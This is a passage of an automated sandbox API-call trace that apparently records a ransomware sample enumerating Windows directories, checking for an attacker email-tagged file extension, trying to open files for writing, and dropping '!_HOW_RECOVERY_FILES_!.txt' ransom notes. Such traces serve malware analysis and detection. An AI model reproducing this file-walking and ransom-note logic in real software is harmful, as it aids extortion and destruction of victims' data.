dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.550] GetLastError () returned 0x5 [0088.550] FindNextFileW (in: hFindFile=0x84b11dd560, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.550] wcsstr (_Str="oskclearui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.550] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui") returned 76 [0088.550] wcscmp (_String1=".", _String2="oskclearui") returned -1 [0088.551] wcscmp (_String1="..", _String2="oskclearui") returned -1 [0088.551] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui") returned 0x4c [0088.551] wcscpy_s (in: _Destination=0x84b0fdd730, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui" | out: _Destination="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui") returned 0x0 [0088.551] wcscat (in: _Dest=0x84b0fdd730, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\*") returned="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\*" [0088.551] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\*", lpFindFileData=0x84b0fdd4e0 | out: lpFindFileData=0x84b0fdd4e0) returned 0x84b11ddbc0 [0088.551] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.551] _snwprintf (in: _Dest=0x84b0fdd730, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\.") returned 78 [0088.551] wcscmp (_String1=".", _String2=".") returned 0 [0088.551] FindNextFileW (in: hFindFile=0x84b11ddbc0, lpFindFileData=0x84b0fdd4e0 | out: lpFindFileData=0x84b0fdd4e0) returned 1 [0088.551] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.551] _snwprintf (in: _Dest=0x84b0fdd730, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\..") returned 79 [0088.551] wcscmp (_String1=".", _String2="..") returned -1 [0088.551] wcscmp (_String1="..", _String2="..") returned 0 [0088.551] FindNextFileW (in: hFindFile=0x84b11ddbc0, lpFindFileData=0x84b0fdd4e0 | out: lpFindFileData=0x84b0fdd4e0) returned 1 [0088.551] wcsstr (_Str="oskclearuibase.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.551] _snwprintf (in: _Dest=0x84b0fdd730, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\oskclearuibase.xml") returned 95 [0088.551] wcscmp (_String1="oskclearuibase.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.551] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="oskclearuibase.xml") returned 0x0 [0088.551] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\oskclearuibase.xml") returned 0x5f [0088.551] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\oskclearuibase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\oskclearuibase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.552] GetLastError () returned 0x5 [0088.552] FindNextFileW (in: hFindFile=0x84b11ddbc0, lpFindFileData=0x84b0fdd4e0 | out: lpFindFileData=0x84b0fdd4e0) returned 0 [0088.552] FindClose (in: hFindFile=0x84b11ddbc0 | out: hFindFile=0x84b11ddbc0) returned 1 [0088.552] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui") returned 0x4c [0088.552] strlen (_Str="${KEY}") returned 0x6 [0088.552] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0088.552] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0088.552] strlen (_Str="${CODE}") returned 0x7 [0088.552] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0088.552] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.552] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.552] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0088.552] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0088.552] __uncaught_exception () returned 0x84b1160800 [0088.552] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0088.553] FindNextFileW (in: hFindFile=0x84b11dd560, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.553] wcsstr (_Str="oskclearui.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.553] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui.xml") returned 80 [0088.553] wcscmp (_String1="oskclearui.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.553] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="oskclearui.xml") returned 0x0 [0088.553] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui.xml") returned 0x50 [0088.553] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskclearui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.553] GetLastError () returned 0x5 [0088.553] FindNextFileW (in: hFindFile=0x84b11dd560, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.553] wcsstr (_Str="oskmenu", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.553] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu") returned 73 [0088.553] wcscmp (_String1=".", _String2="oskmenu") returned -1 [0088.553] wcscmp (_String1="..", _String2="oskmenu") returned -1 [0088.553] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu") returned 0x49 [0088.553] wcscpy_s (in: _Destination=0x84b0fdd730, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu" | out: _Destination="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu") returned 0x0 [0088.553] wcscat (in: _Dest=0x84b0fdd730, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\*") returned="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\*" [0088.553] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\*", lpFindFileData=0x84b0fdd4e0 | out: lpFindFileData=0x84b0fdd4e0) returned 0x84b11ddc80 [0088.554] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.554] _snwprintf (in: _Dest=0x84b0fdd730, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\.") returned 75 [0088.554] wcscmp (_String1=".", _String2=".") returned 0 [0088.554] FindNextFileW (in: hFindFile=0x84b11ddc80, lpFindFileData=0x84b0fdd4e0 | out: lpFindFileData=0x84b0fdd4e0) returned 1 [0088.554] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.554] _snwprintf (in: _Dest=0x84b0fdd730, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\..") returned 76 [0088.554] wcscmp (_String1=".", _String2="..") returned -1 [0088.554] wcscmp (_String1="..", _String2="..") returned 0 [0088.554] FindNextFileW (in: hFindFile=0x84b11ddc80, lpFindFileData=0x84b0fdd4e0 | out: lpFindFileData=0x84b0fdd4e0) returned 1 [0088.554] wcsstr (_Str="oskmenubase.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.554] _snwprintf (in: _Dest=0x84b0fdd730, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml") returned 89 [0088.554] wcscmp (_String1="oskmenubase.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.554] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="oskmenubase.xml") returned 0x0 [0088.554] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml") returned 0x59 [0088.554] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.554] GetLastError () returned 0x5 [0088.554] FindNextFileW (in: hFindFile=0x84b11ddc80, lpFindFileData=0x84b0fdd4e0 | out: lpFindFileData=0x84b0fdd4e0) returned 0 [0088.554] FindClose (in: hFindFile=0x84b11ddc80 | out: hFindFile=0x84b11ddc80) returned 1 [0088.554] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu") returned 0x49 [0088.554] strlen (_Str="${KEY}") returned 0x6 [0088.554] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0088.554] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0088.554] strlen (_Str="${CODE}") returned 0x7 [0088.554] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0088.554] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.554] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.554] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0088.555] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0088.555] __uncaught_exception () returned 0x84b1160800 [0088.555] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0088.555] FindNextFileW (in: hFindFile=0x84b11dd560, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.555] wcsstr (_Str="oskmenu.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.555] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml") returned 77 [0088.555] wcscmp (_String1="oskmenu.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.555] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="oskmenu.xml") returned 0x0 [0088.556] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml") returned 0x4d [0088.556] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.556] GetLastError () returned 0x5 [0088.556] FindNextFileW (in: hFindFile=0x84b11dd560, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.556] wcsstr (_Str="osknav", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.556] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav") returned 72 [0088.556] wcscmp (_String1=".", _String2="osknav") returned -1 [0088.556] wcscmp (_String1="..", _String2="osknav") returned -1 [0088.556] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav") returned 0x48 [0088.556] wcscpy_s (in: _Destination=0x84b0fdd730, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav" | out: _Destination="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav") returned 0x0 [0088.556] wcscat (in: _Dest=0x84b0fdd730, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\*") returned="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\*" [0088.556] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\*", lpFindFileData=0x84b0fdd4e0 | out: lpFindFileData=0x84b0fdd4e0) returned 0x84b11dd5c0 [0088.556] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.556] _snwprintf (in: _Dest=0x84b0fdd730, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\.") returned 74 [0088.556] wcscmp (_String1=".", _String2=".") returned 0 [0088.556] FindNextFileW (in: hFindFile=0x84b11dd5c0, lpFindFileData=0x84b0fdd4e0 | out: lpFindFileData=0x84b0fdd4e0) returned 1 [0088.556] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.556] _snwprintf (in: _Dest=0x84b0fdd730, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\..") returned 75 [0088.556] wcscmp (_String1=".", _String2="..") returned -1 [0088.556] wcscmp (_String1="..", _String2="..") returned 0 [0088.556] FindNextFileW (in: hFindFile=0x84b11dd5c0, lpFindFileData=0x84b0fdd4e0 | out: lpFindFileData=0x84b0fdd4e0) returned 1 [0088.556] wcsstr (_Str="osknavbase.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.556] _snwprintf (in: _Dest=0x84b0fdd730, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\osknavbase.xml") returned 87 [0088.556] wcscmp (_String1="osknavbase.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.556] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="osknavbase.xml") returned 0x0 [0088.556] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\osknavbase.xml") returned 0x57 [0088.556] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\osknavbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknav\\osknavbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.557] GetLastError () returned 0x5 [0088.557] FindNextFileW (in: hFindFile=0x84b11dd5c0, lpFindFileData=0x84b0fdd4e0 | out: lpFindFileData=0x84b0fdd4e0) returned 0 [0088.557] FindClose (in: hFindFile=0x84b11dd5c0 | out: hFindFile=0x84b11dd5c0) returned 1 [0088.557] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav") returned 0x48 [0088.557] strlen (_Str="${KEY}") returned 0x6 [0088.557] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0088.557] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0088.557] strlen (_Str="${CODE}") returned 0x7 [0088.557] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0088.557] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.557] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.557] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0088.558] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0088.558] __uncaught_exception () returned 0x84b1160800 [0088.558] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0088.558] FindNextFileW (in: hFindFile=0x84b11dd560, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.558] wcsstr (_Str="osknav.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.558] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav.xml") returned 76 [0088.558] wcscmp (_String1="osknav.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.558] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="osknav.xml") returned 0x0 [0088.558] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav.xml") returned 0x4c [0088.558] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknav.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.559] GetLastError () returned 0x5 [0088.559] FindNextFileW (in: hFindFile=0x84b11dd560, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.559] wcsstr (_Str="osknumpad", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.559] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad") returned 75 [0088.559] wcscmp (_String1=".", _String2="osknumpad") returned -1 [0088.559] wcscmp (_String1="..", _String2="osknumpad") returned -1 [0088.559] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad") returned 0x4b [0088.559] wcscpy_s (in: _Destination=0x84b0fdd730, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad" | out: _Destination="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad") returned 0x0 [0088.559] wcscat (in: _Dest=0x84b0fdd730, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\*") returned="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\*" [0088.559] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\*", lpFindFileData=0x84b0fdd4e0 | out: lpFindFileData=0x84b0fdd4e0) returned 0x84b11ddd40 [0088.559] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.559] _snwprintf (in: _Dest=0x84b0fdd730, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\.") returned 77 [0088.559] wcscmp (_String1=".", _String2=".") returned 0 [0088.559] FindNextFileW (in: hFindFile=0x84b11ddd40, lpFindFileData=0x84b0fdd4e0 | out: lpFindFileData=0x84b0fdd4e0) returned 1 [0088.559] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.559] _snwprintf (in: _Dest=0x84b0fdd730, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\..") returned 78 [0088.559] wcscmp (_String1=".", _String2="..") returned -1 [0088.559] wcscmp (_String1="..", _String2="..") returned 0 [0088.559] FindNextFileW (in: hFindFile=0x84b11ddd40, lpFindFileData=0x84b0fdd4e0 | out: lpFindFileData=0x84b0fdd4e0) returned 1 [0088.559] wcsstr (_Str="osknumpadbase.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.559] _snwprintf (in: _Dest=0x84b0fdd730, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml") returned 93 [0088.559] wcscmp (_String1="osknumpadbase.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.559] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="osknumpadbase.xml") returned 0x0 [0088.559] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml") returned 0x5d [0088.559] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.559] GetLastError () returned 0x5 [0088.559] FindNextFileW (in: hFindFile=0x84b11ddd40, lpFindFileData=0x84b0fdd4e0 | out: lpFindFileData=0x84b0fdd4e0) returned 0 [0088.559] FindClose (in: hFindFile=0x84b11ddd40 | out: hFindFile=0x84b11ddd40) returned 1 [0088.560] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad") returned 0x4b [0088.560] strlen (_Str="${KEY}") returned 0x6 [0088.560] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0088.560] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0088.560] strlen (_Str="${CODE}") returned 0x7 [0088.560] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0088.560] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.560] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.560] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0088.561] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0088.561] __uncaught_exception () returned 0x84b1160800 [0088.561] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0088.561] FindNextFileW (in: hFindFile=0x84b11dd560, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.561] wcsstr (_Str="osknumpad.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.561] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml") returned 79 [0088.561] wcscmp (_String1="osknumpad.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.561] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="osknumpad.xml") returned 0x0 [0088.561] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml") returned 0x4f [0088.561] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.562] GetLastError () returned 0x5 [0088.562] FindNextFileW (in: hFindFile=0x84b11dd560, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.562] wcsstr (_Str="oskpred", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.562] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred") returned 73 [0088.562] wcscmp (_String1=".", _String2="oskpred") returned -1 [0088.562] wcscmp (_String1="..", _String2="oskpred") returned -1 [0088.562] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred") returned 0x49 [0088.562] wcscpy_s (in: _Destination=0x84b0fdd730, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred" | out: _Destination="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred") returned 0x0 [0088.562] wcscat (in: _Dest=0x84b0fdd730, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\*") returned="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\*" [0088.562] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\*", lpFindFileData=0x84b0fdd4e0 | out: lpFindFileData=0x84b0fdd4e0) returned 0x84b11dd440 [0088.562] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.562] _snwprintf (in: _Dest=0x84b0fdd730, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\.") returned 75 [0088.562] wcscmp (_String1=".", _String2=".") returned 0 [0088.562] FindNextFileW (in: hFindFile=0x84b11dd440, lpFindFileData=0x84b0fdd4e0 | out: lpFindFileData=0x84b0fdd4e0) returned 1 [0088.562] wcsstr (_Str="..", 